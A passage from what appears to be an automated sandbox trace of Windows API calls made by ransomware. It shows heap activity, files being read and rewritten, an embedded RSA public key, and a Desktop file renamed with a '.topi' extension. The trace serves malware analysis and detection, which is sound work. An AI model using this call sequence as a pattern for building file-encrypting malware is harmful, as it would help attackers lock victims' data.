lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.540] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.540] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.540] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9090 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d90d8 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.541] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.541] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.542] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.542] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90a8 | out: hHeap=0x680000) returned 1 [0094.542] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.542] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9090 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.542] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9078 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3bb0 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.543] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x16808, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x16808, lpOverlapped=0x0) returned 1 [0094.543] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0094.543] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1680d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.543] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.544] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.544] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0094.544] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.544] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.544] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.544] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0094.544] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.544] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.544] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.544] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.544] CloseHandle (hObject=0x6a8) returned 1 [0094.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0094.549] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0094.549] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O-_yybE0jRAzBusLRG.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o-_yybe0jrazbuslrg.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\O-_yybE0jRAzBusLRG.rtf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o-_yybe0jrazbuslrg.rtf.topi")) returned 1 [0094.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.550] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.551] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeba0e830, ftCreationTime.dwHighDateTime=0x1d5be5b, ftLastAccessTime.dwLowDateTime=0xd751c870, ftLastAccessTime.dwHighDateTime=0x1d5be2b, ftLastWriteTime.dwLowDateTime=0xd751c870, ftLastWriteTime.dwHighDateTime=0x1d5be2b, nFileSizeHigh=0x0, nFileSizeLow=0x104d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OEL7b8_7aVATtdQDgj.flv", cAlternateFileName="OEL7B8~1.FLV")) returned 1 [0094.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.551] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OEL7b8_7aVATtdQDgj.flv") returned=".flv" [0094.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OEL7b8_7aVATtdQDgj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oel7b8_7avattdqdgj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.551] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=66772) returned 1 [0094.552] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.554] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x104ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.554] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.555] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.555] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x104d4, lpOverlapped=0x0) returned 1 [0094.555] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.555] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.556] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.556] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.557] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.557] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.557] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.557] GetLastError () returned 0x0 [0094.557] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.557] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.557] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.557] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.557] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104d0) returned 0x9a06a00 [0094.557] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.557] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3bb0 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9078 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3bf8 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9090 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90d8 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.558] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d90d8 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d90c0 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.558] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.559] GetCurrentThreadId () returned 0x8c4 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1b80 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.559] GetCurrentThreadId () returned 0x8c4 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.559] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.559] HeapFree 